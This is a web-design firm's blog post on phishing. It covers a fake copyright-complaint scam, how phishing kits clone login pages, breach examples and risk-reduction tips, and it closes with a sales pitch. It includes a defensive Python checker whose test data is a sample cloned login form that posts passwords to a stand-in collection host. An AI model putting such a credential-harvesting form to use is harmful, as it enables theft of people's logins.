Phishing Isn’t Phunny

One of our clients recently received an email from “Melynda”.  She stated she was a photographer and claimed copyright infringement regarding photos used on his website.  Obviously, this caused great alarm and required immediate attention.  Or did it?   This is a scam of the “phishing” variety and has been documented in multiple sources online.

In case you receive a comparable email, the “sender” is generally Melinda, Mel or Melynda.  As noted, she claims you have stolen her intellectual property (photos) and demands you remove them immediately.  She goes further, offering to “prove” her ownership, and provides a link.  Don’t fall for this line of garbage.  The link, not the copyright claim, is the point of the email: it leads to a page or download built to steal your credentials or compromise your computer, not to evidence.  Though the message may seem convincing at first, do your own research before going any further, and if you want to check the photos on your site, do it from your own files rather than from her link.

What is Phishing?

The Oxford Dictionary defines phishing as “the fraudulent practice of sending emails purporting to be from reputable companies in order to induce individuals to reveal personal information, such as passwords and credit card numbers”.

Dating back to the 1990s, phishing is one of the oldest and most common forms of cyberattack.  In fact, phishing is so pervasive that, by some industry estimates, over 78% of all data breaches begin with a phishing attack.   Notable data breaches in the last five years include:

  • Hackers (phishermen) sent Hillary Clinton’s campaign chairman John Podesta a fake Google security alert and convinced him to enter his Gmail password, opening his mail up for their perusal.
  • The iCloud accounts of several celebrities were taken over through phishing emails that harvested their Apple credentials, and intimate photos were made public.  Apple’s servers themselves were not breached; the attackers simply logged in with stolen passwords.
  • University of Kansas employees were convinced to enter their payroll credentials on a fake login page; the attackers then changed the employees’ direct deposit details and diverted their paychecks.

As you can see, this form of cyberattack works on intelligent, well-educated individuals just as well as on the gullible, naïve or elderly.

Phishing attacks are generally after one of three things: (a) financial information, such as credit card numbers; (b) personal information, such as passwords; or (c) a click on a link or download that installs ransomware or other malware on your system.

Why is Phishing Effective?

Cybercriminals can purchase phishing “kits” on the dark web.  These kits are what make the scam look so realistic and fool even the discerning.  A kit provides the framework and information necessary to set up a fake website, fake URL and fake email, all designed for one single purpose: to convince you of the sender’s legitimacy and entice you into providing the information they want.

The kit works like this:

  1. The legitimate website is cloned (think Amazon or your local bank).
  2. The login page is changed to point toward a script focused on stealing your credentials.
  3. These modifications are then bundled together in a Zip file and sold as a kit on the dark web.
  4. Once purchased, the kit is uploaded to a hacked website and the files are unzipped.
  5. Emails are then sent with links that point to the fake website.  When you “log in”, the page hands your username and password to the harvesting script, which often forwards you on to the real site so nothing looks wrong.  As everything looks normal, you innocently provide what they are looking for.
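Step 2 of the kit is the part a defender can actually test for.  The following Python is an added example, not code from this article or from any phishing kit: it parses a saved copy of a login page and reports any form containing a password field whose action resolves to a host other than the one serving the page.  The two sample pages and the host names in them (the PayPal-style sign-in URL, collect.example) are constructed for illustration.

```python
"""Check whether a login page's form submits credentials off-site.

Added example (not code from the original article). Step 2 of the kit
rewires the cloned login form to a harvesting script; when that script
lives on a different host than the page, the form's action gives it away.
The sample pages and host names below are constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Collect every <form> with its action and whether it has a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def host_of(url):
    """Lower-cased host name of a URL, or '' if it has none."""
    return (urlsplit(url).hostname or "").lower()


def offsite_credential_forms(page_url, html):
    """Return the resolved action URLs of password forms that post to a
    host other than the one serving the page."""
    collector = _FormCollector()
    collector.feed(html)
    page_host = host_of(page_url)
    flagged = []
    for form in collector.forms:
        if not form["has_password"]:
            continue
        # An empty or relative action resolves against the page's own URL.
        action = urljoin(page_url, form["action"])
        if host_of(action) != page_host:
            flagged.append(action)
    return flagged


# Constructed samples: a cloned PayPal-style sign-in page wired to a
# harvesting script, and a legitimate page whose form posts to itself.
CLONED_PAGE = """<html><body>
<form method="post" action="https://collect.example/post.php">
  <input name="email"> <input type="password" name="pass">
</form></body></html>"""

LEGIT_PAGE = """<html><body>
<form method="post" action="/signin/submit">
  <input name="email"> <input type="password" name="pass">
</form></body></html>"""

if __name__ == "__main__":
    print(offsite_credential_forms("https://www.paypal.com/signin", CLONED_PAGE))
    print(offsite_credential_forms("https://www.paypal.com/signin", LEGIT_PAGE))
```

The check is deliberately narrow.  A kit dropped onto a hacked site often posts to a relative post.php on that same host, and some pages submit via JavaScript rather than a form action, so a clean result here is not proof the page is genuine; checking that the domain in the address bar really belongs to the company is the complementary test.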

A company called Ironscales monitored 50,000 fake log-in pages.  The most common companies for phishers to clone were:

  • PayPal – 22%
  • Microsoft – 19%
  • Facebook – 15%
  • eBay – 6%
  • Amazon – 3%

How to Reduce Your Risk of Getting Caught

There are some steps you can take to reduce the risk of being a phishing scam victim.

  1. Always double-check the spelling of a URL before you click a link or share sensitive data. Frequently these have a minor and easily overlooked change, such as an l in place of an i or a 1 in place of an l, or the real company’s name tucked in front of a completely different domain.
  2. Watch for URL redirects, where you are sent to a fraudulent website with a duplicated design. We don’t habitually look at the URL, but checking that the address in the browser bar actually belongs to the company in question, before you type anything, is an excellent way to detect a phishing scam.
  3. If you receive a suspicious email, don’t reply. Replying confirms to the sender that your address is live and that you read their mail, and it invites a follow-up; report the message to your IT department or email provider instead.
  4. Don’t share personal data such as birthdays, vacation plans, your phone number or address on social media. These all give cybercriminals clues about you and can make their phishing expeditions much more believable.
  5. Have your IT department run inbound email through a sandbox, a service that opens attachments and follows links in an isolated environment BEFORE the email reaches your computer. It is a strong filter, not a guarantee: links that only turn malicious after delivery can slip through, so the checks above still matter.
  6. Turn on multi-factor authentication wherever it is offered. A phished password is far less useful to a criminal who also needs the code from your phone.
  7. Pay attention. We all go through our day responding to unrelenting email; it’s a part of our life and our livelihood. Slow down when a message demands urgent action, threatens consequences or asks you to log in somewhere.
  8. Get Top Roof Marketing’s Ongoing Security/Protection Program. This won’t stop a phishing attempt; but should that attempt result in damage to your existing site, it will get your site repaired at no cost to you.  Additionally, the increased security and routinely updated WordPress platform may reduce the potential for a cyberattack in the future.

For more information, please call the Top Roof Marketing team today at (800) 795-2187 and make yourself and your website “out of season” for the phishing cybercriminal community.